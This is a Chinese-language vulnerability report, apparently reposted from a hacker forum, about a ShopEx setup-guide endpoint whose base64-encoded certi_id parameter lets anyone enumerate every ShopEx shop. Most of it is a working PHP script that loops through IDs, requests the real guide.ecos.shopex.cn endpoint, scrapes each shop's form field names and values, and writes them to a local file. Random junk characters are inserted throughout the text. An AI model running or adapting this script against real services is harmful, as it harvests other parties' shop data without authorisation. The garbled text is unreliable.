|
简要描述:4 @" K# W' }5 q! j
ShopEx某接口缺陷,可遍历所有网站
5 Y& M# W/ \0 A" Y W; w3 O# R详细说明:- Z7 }5 T R" P+ B5 j, T& o$ ^
问题出现在shopex 网店使用向导页面 - ?* ?. \! c! W' v; u
. E( h7 }: p3 \; Y3 B
( ~5 y% a) i8 Y/ U6 o5 _: d# d+ k* V7 a/ R6 }% k
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
' G3 s4 B! b* Q j
& `8 _ C0 }7 k0 p
' r1 G9 a7 K* g
+ S" B$ G+ Q( b$ w, srefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}8 p' h) \8 c* \' m$ V
2 Y# P. T8 w5 ~/ n7 u, `: s8 D r
/ M7 k! E4 v6 m7 l5 r+ y
/ t: G+ u) u3 i我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
0 x L; x) {9 J( D$ N9 T. H$ H* \1 [' }6 N
?/ m& x* r, s# t
) c- o% b. u- o+ f<?php
+ `. k; ~- g1 q% R \, G& @% ~0 T0 Y# `2 f) h" ]; w
for ($i=1; $i < 10000; $i++) { //遍历# v/ b' B, }; [9 r
9 G: \1 Z2 L3 ^* @$ z }! Z
ShowshopExD($i);( H/ {/ \$ ^. c6 Y
, o- Y( p" c" Z' l7 c
}
1 p8 c8 A! }. M5 m1 W; D
2 D, y5 d1 O3 U! {, `' E' z0 \: ~ function ShowshopExD($cid) {; K5 ?. |9 O# x2 c" s$ I9 C
% Y1 T3 t( ]8 {& B6 a" X5 C9 X$ @ $url='http://guide.ecos.shopex.cn/step2.php';3 E% P7 b1 [) E7 f0 L3 q$ d
2 q, q K. m/ g5 L+ Q $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');- l8 n' U6 L7 Q+ c+ w( C
; l1 I( P' i R' [1 A# k0 o
$url = $url.'?refer='.$refer;1 `0 N+ l" T( o9 Z6 N) f
+ y+ k4 X. ?' Q; I: a5 J6 c $ch = curl_init($url);) Q- U/ I& E* r9 U# w7 T C
' G0 A& ^5 C2 b
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;$ N# ^# J$ h6 h# J
6 M6 S# c3 h9 ]6 z6 }# \" A curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;0 T+ }' K' i$ z! C5 `
3 O, m! e3 K1 K% g( y $result = curl_exec($ch);" a0 O9 I8 i8 Q$ a3 ~/ Y7 j
x0 j8 @- o K; X7 I1 u
$result = mb_convert_encoding($result, "gb2312", "UTF-8");) V6 e8 e, u+ ^0 y9 q9 ?
0 c" {" v+ w F2 G7 H: S if(strpos($result,$refer))
$ j" A% K0 n) X6 [" V8 d6 j0 F) C# D8 o, J( @1 z( }8 {- y5 P( t
{& [1 R9 l! c; O( b/ e# N0 V
' c; u' @" s8 p( r$ m2 ] $fp = fopen("c:/shopEx.txt",'ab'); //保存文件6 M, D( R9 n( F- d# [( T1 B7 \
1 v) F4 r, s& z7 C: U
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
9 U: Q8 _+ {- }) V0 P7 C0 N: U- g4 L$ a
foreach ($value[1] as $key) {, A8 w ~+ `) C0 T
7 l: q3 G' ], t) v* S( p
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
6 N5 E, _& m+ l g5 P6 f* A
' E7 W. \( T# D3 O% c) @" M9 [( l5 l echo $res[1][0].':'.$res[3][0]."\r\n";
: y+ V K( p) I X' w. z0 P
& U( b1 A9 u* j $col =$res[1][0].':'.$res[3][0]."\r\n"; " A4 b" n P S o! s) g' {
2 ?/ g# B: Z, H7 W: ]' G3 @8 p fwrite($fp, $col, strlen($col));
, r6 w2 ?6 H. H
& Q4 R0 C9 k) r Z }. g2 p8 i. @2 m3 \, q& Z# F* ~
- F( O; i ?6 W
echo '--------------------------------'."\r\n";+ Z/ W1 |5 F3 e( w- N( @5 R" a
' B+ N+ h% m& q' u
fclose($fp);
/ i5 w; d9 }5 J3 B! } V0 u
8 D1 `7 V3 g" R- G) ]' G }2 v0 _4 H) ?1 }" W( e
. x, e# \ G Y4 ~
flush();% x4 k/ R. m; @' @9 [+ U9 L* {% V8 k
1 K. r# r9 |0 E+ l: D+ f curl_close($ch);! _. S) R6 w2 W0 D3 ~( X
7 ^7 ]9 }. N. `4 O }
' w7 X1 o4 V* r2 O* D& y( i
6 t4 V- X3 u( }4 X5 {0 O2 L?>
. _4 D2 `$ f; o* B漏洞证明:2 u/ ~; z* J! I$ I, P& B& P2 X% w8 E
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg! J% a/ J. W1 `. W' |% j
refer换成其他加密方式
- X: k1 t( n# A' j |
|